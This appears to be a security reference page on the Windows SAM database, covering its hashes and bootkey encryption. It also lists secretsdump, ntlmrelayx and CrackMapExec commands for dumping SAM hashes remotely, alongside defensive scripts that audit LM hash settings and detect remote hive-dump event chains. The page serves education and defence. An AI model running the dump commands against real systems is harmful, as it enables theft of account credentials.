SAM Base

Administrator rights on the target machine are mandatory.

What is SAM?

The Security Account Manager (SAM) stands as a fundamental component within Windows, entrusted with the storage and administration of local user and group accounts. This database file serves as the bedrock for authenticating local user logons.

What Purpose does SAM Serve?

The SAM database is loaded as a background process at system startup and works alongside other processes and services. Windows offers two primary configurations: workgroup and domain. In a workgroup, each computer maintains its own SAM, which holds data about local user and group accounts. Passwords associated with these accounts are hashed before being stored in the SAM, a measure that strengthens security and reduces exposure to attack. The Local Security Authority (LSA) verifies a user's logon attempt by checking the supplied credentials against the data held in the SAM. A logon succeeds only when the entered password matches the password stored in the local SAM.

Within domain-joined systems, two distinct logon types exist: local and domain-based. While local logons adhere to the principles outlined above, domain user logons leverage the Active Directory (AD) database coupled with the WinLogon service.

A Comprehensive Exploration of the SAM Hive

Delving into the SAM hive reveals its components, its encryption scheme, and the process by which its secrets are extracted.

1. Key Components of the SAM Hive:

  • Users and Groups: The SAM hive encapsulates information about local users and groups, along with their corresponding security identifiers (SIDs). These entries establish the foundational building blocks of the Windows security framework.

  • Password Hashes: A crucial aspect of the SAM hive is its storage of password hashes for local accounts. User passwords are kept in the SAM registry either as an LM hash or an NT hash, depending on Group Policy settings. The LM hash is a legacy hashing technique created in 1987 and enabled by default on Windows versions prior to Windows Vista/Windows Server 2008. Because LM hashes are now deemed cryptographically unsafe, Microsoft recommends disabling storage of LM hashes wherever possible. An attacker can brute force the whole LM key space in a reasonably short period of time: if the hashes are obtained, they can be broken using rainbow tables or a brute-force password guessing attack within a few minutes.

  • Bootkey Encryption: To add a layer of protection, the SAM hive encrypts password hashes using a bootkey. This bootkey, unique to each computer, is derived from information contained within the HKLM\SYSTEM\CurrentControlSet\Control\Lsa registry key.
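The Group Policy setting referred to in the Password Hashes bullet is backed by values under the same HKLM\SYSTEM\CurrentControlSet\Control\Lsa key named above. The following is an added example, not code from the original page: it parses the text that `reg export` produces for that key and checks two real values, NoLMHash (1 disables LM hash storage at the next password change) and LmCompatibilityLevel (3 or higher sends NTLMv2 only; 5 also refuses LM and NTLM at the server). The two exports are constructed samples, a weak configuration beside a hardened one, and carry invented values.

```python
"""Audit an exported Lsa registry key for LM hash related weaknesses."""
import re

LSA_KEY = r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa"

# Constructed `reg export` output (invented values, not taken from any real host):
# a host that still stores LM hashes and will send LM/NTLMv1 responses.
WEAK_EXPORT = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa]
"NoLMHash"=dword:00000000
"LmCompatibilityLevel"=dword:00000001
"Bounds"=hex:00,30,00,00,00,20,00,00
"""

# Constructed hardened counterpart: no LM hashes, NTLMv2 only.
HARDENED_EXPORT = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa]
"NoLMHash"=dword:00000001
"LmCompatibilityLevel"=dword:00000005
"""


def parse_reg_export(text):
    """Return {key_path: {value_name: value}} from .reg export text.

    dword values become ints, quoted strings become str, anything else
    (hex, multi-string) is kept as the raw right-hand side.
    """
    keys = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("Windows Registry Editor"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys.setdefault(current, {})
            continue
        match = re.match(r'^"([^"]+)"=(.*)$', line)
        if match and current is not None:
            name, value = match.groups()
            if value.startswith("dword:"):
                keys[current][name] = int(value[len("dword:"):], 16)
            elif value.startswith('"') and value.endswith('"'):
                keys[current][name] = value[1:-1]
            else:
                keys[current][name] = value
    return keys


def audit_lsa(keys):
    """Return a list of findings (empty list means the checked values are sound)."""
    lsa = keys.get(LSA_KEY, {})
    findings = []

    no_lm = lsa.get("NoLMHash")
    if no_lm is None:
        findings.append("NoLMHash is absent: the OS default applies, confirm it through policy")
    elif no_lm != 1:
        # Note: setting NoLMHash=1 only stops *new* LM hashes; hashes already
        # stored remain until each account's password is changed.
        findings.append(f"NoLMHash={no_lm}: LM hashes are stored at the next password change")

    level = lsa.get("LmCompatibilityLevel")
    if level is None:
        findings.append("LmCompatibilityLevel is absent: the OS default applies, confirm it through policy")
    elif level < 3:
        findings.append(
            f"LmCompatibilityLevel={level}: LM/NTLMv1 responses may still be sent; "
            "use 3 or higher (NTLMv2 only), 5 also refuses LM and NTLM at the server"
        )
    return findings


if __name__ == "__main__":
    for label, export in (("weak", WEAK_EXPORT), ("hardened", HARDENED_EXPORT)):
        print(label, audit_lsa(parse_reg_export(export)) or ["no findings"])
```

On a live host the input would come from `reg export "HKLM\SYSTEM\CurrentControlSet\Control\Lsa" lsa.reg`; the parser deliberately ignores hex and multi-string values so unrelated entries under the key do not break the audit.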

Extracting SAM Secrets

Secretsdump:

secretsdump.py, from the Impacket suite, can be used to extract the SAM database remotely:

python secretsdump.py <DOMAIN>/<USER>:<PASSWORD>@<TARGET>

NTLMRelayx:

The SAM database can be dumped remotely through ntlmrelayx:

python3 ntlmrelayx.py -tf targets.txt -smb2support

CrackMapExec:

It is possible to dump the SAM hashes using the secretsdump.py routines through CrackMapExec:

cme smb <TARGET> -u <USERNAME> -p <PASSWORD> --sam
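All three tools above use the same Impacket remote-dump code path, which starts the Remote Registry service on the target if it is stopped, saves the hives and retrieves the saved copies over the ADMIN$ share. The following detection logic is an added example, not part of the original page or of any of the tools named: it reads constructed event records (invented hosts, times and addresses, field names mirroring the Windows Security and System logs) and raises an alert when a host shows at least two of three indicators within a five-minute window: Remote Registry entering the running state (event 7036), a handle request on \REGISTRY\MACHINE\SAM by a process other than lsass.exe (event 4656) and a .tmp file accessed through ADMIN$ (event 5145). The window length and the two-indicator threshold are assumptions to tune per environment.

```python
"""Flag hosts whose event stream matches a remote SAM hive dump chain."""
import json
from collections import defaultdict
from datetime import datetime, timedelta

WINDOW = timedelta(minutes=5)  # assumed correlation window

# Constructed sample records (not real telemetry). WS01 shows the full chain;
# WS02 only has a Remote Registry start and a normal file on ADMIN$.
SAMPLE_LOG = r"""
{"TimeCreated": "2024-05-01T10:00:01", "Computer": "WS01", "EventID": 4624, "LogonType": 3, "TargetUserName": "itadmin", "IpAddress": "10.0.0.50"}
{"TimeCreated": "2024-05-01T10:00:03", "Computer": "WS01", "EventID": 7036, "ServiceName": "Remote Registry", "State": "running"}
{"TimeCreated": "2024-05-01T10:00:05", "Computer": "WS01", "EventID": 4656, "ObjectName": "\\REGISTRY\\MACHINE\\SAM", "ProcessName": "C:\\Windows\\System32\\svchost.exe"}
{"TimeCreated": "2024-05-01T10:00:06", "Computer": "WS01", "EventID": 5145, "ShareName": "\\\\*\\ADMIN$", "RelativeTargetName": "Temp\\qzxkfoac.tmp", "IpAddress": "10.0.0.50"}
{"TimeCreated": "2024-05-01T11:30:00", "Computer": "WS02", "EventID": 7036, "ServiceName": "Remote Registry", "State": "running"}
{"TimeCreated": "2024-05-01T11:45:00", "Computer": "WS02", "EventID": 5145, "ShareName": "\\\\*\\ADMIN$", "RelativeTargetName": "Temp\\report.docx", "IpAddress": "10.0.0.7"}
"""


def parse_events(text):
    """One JSON object per line -> list of dicts (blank lines skipped)."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def is_hive_dump_indicator(event):
    """True when a single record is one of the three indicators."""
    event_id = event.get("EventID")
    if event_id == 7036:
        return event.get("ServiceName") == "Remote Registry" and event.get("State") == "running"
    if event_id == 4656:
        obj = event.get("ObjectName", "").upper()
        proc = event.get("ProcessName", "").lower()
        # lsass.exe legitimately opens the SAM hive; anything else is unusual.
        return obj.startswith("\\REGISTRY\\MACHINE\\SAM") and not proc.endswith("\\lsass.exe")
    if event_id == 5145:
        share = event.get("ShareName", "").upper()
        target = event.get("RelativeTargetName", "").lower()
        return share.endswith("ADMIN$") and target.endswith(".tmp")
    return False


def find_hive_dump_chains(events, window=WINDOW):
    """Return one alert per host where >= 2 distinct indicators fall inside `window`."""
    by_host = defaultdict(list)
    for event in events:
        if is_hive_dump_indicator(event):
            by_host[event["Computer"]].append(event)

    alerts = []
    for host, indicators in by_host.items():
        indicators.sort(key=lambda e: e["TimeCreated"])
        for i, first in enumerate(indicators):
            start = datetime.fromisoformat(first["TimeCreated"])
            cluster = [
                e for e in indicators[i:]
                if datetime.fromisoformat(e["TimeCreated"]) - start <= window
            ]
            event_ids = {e["EventID"] for e in cluster}
            if len(event_ids) >= 2:
                alerts.append({
                    "host": host,
                    "start": first["TimeCreated"],
                    "event_ids": sorted(event_ids),
                    "sources": sorted({e["IpAddress"] for e in cluster if e.get("IpAddress")}),
                })
                break  # one alert per host is enough for triage
    return alerts


if __name__ == "__main__":
    for alert in find_hive_dump_chains(parse_events(SAMPLE_LOG)):
        print(alert)
```

Two of the three indicators only exist if auditing is configured: event 4656 on the SAM hive needs object access auditing for the registry with a SACL on the key, and event 5145 needs the Detailed File Share audit subcategory; without them the logic falls back to the Remote Registry start alone, which is too noisy to alert on by itself.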
